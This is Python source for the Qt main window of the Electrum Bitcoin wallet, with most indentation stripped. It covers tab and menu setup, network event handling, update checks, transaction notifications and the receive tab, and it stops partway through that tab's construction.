from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
MONOSPACE_FONT)
from .util import ButtonsTextEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.send_tab_is_onchain = False
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab(wallet)
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
if self.wallet.has_lightning():
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'invoice_status', 'request_status']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'channels_updated':
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.lnworker:
wallet.lnworker.on_channels_updated()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except Exception:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
    sorted(recent)  # sanity check: the stored value must be a sortable list
except Exception:
    recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
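# Note on the behaviour above: the menu keeps at most the 5 most recently
# opened wallet paths that still exist on disk, and assigns them
# Ctrl+1 .. Ctrl+5 shortcuts in sorted order.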
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
if self.wallet.has_lightning():
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# 'Settings' / 'Preferences' are reserved menu names on macOS; use 'Electrum preferences' there as a workaround
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
if self.wallet.has_lightning():
tools_menu.addAction(_("&Lightning"), self.gui_object.show_lightning_dialog)
tools_menu.addAction(_("&Watchtower"), self.gui_object.show_watchtower_dialog)
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# Custom wrappers for getOpenFileName and getSaveFileName that remember the directory last selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
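# Illustrative call (arguments hypothetical):
#   fn = self.getSaveFileName(_("Save invoice to file"), "invoice.bip70", "*.bip70")
# The dialog opens in the remembered 'io_dir' and, if the user picks a
# different directory, that choice is stored for the next file dialog.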
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
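# Output sketch for format_amount_and_units: "<amount> <base unit>", with an
# appended " (<fiat amount>)" when an exchange-rate source (self.fx) is enabled.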
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
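# Worked example (numbers illustrative): fee_rate = 5000 sat/kB is divided
# by 1000 and rendered roughly as "5 sat/byte" (digits depend on num_zeros).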
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
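# Conversion sketch for the handler above (BTC-side amounts are in satoshis):
#   BTC -> fiat: fiat = sats * rate / COIN
#   fiat -> BTC: sats = fiat / rate * COIN
# e.g. 50_000_000 sat at a hypothetical rate of 10_000 -> 5_000 fiat units.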
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.lnworker:
l = self.wallet.lnworker.get_balance()
text += u' \U0001f5f2 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
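# Lag example (heights hypothetical): local height 700_005 vs server height
# 700_002 gives server_lag == 3, so the "Server is lagging (3 blocks)" status
# is shown; a lag of 0 or 1 block is treated as in sync.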
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_channels_tab(self, wallet):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', 3600)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(True)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
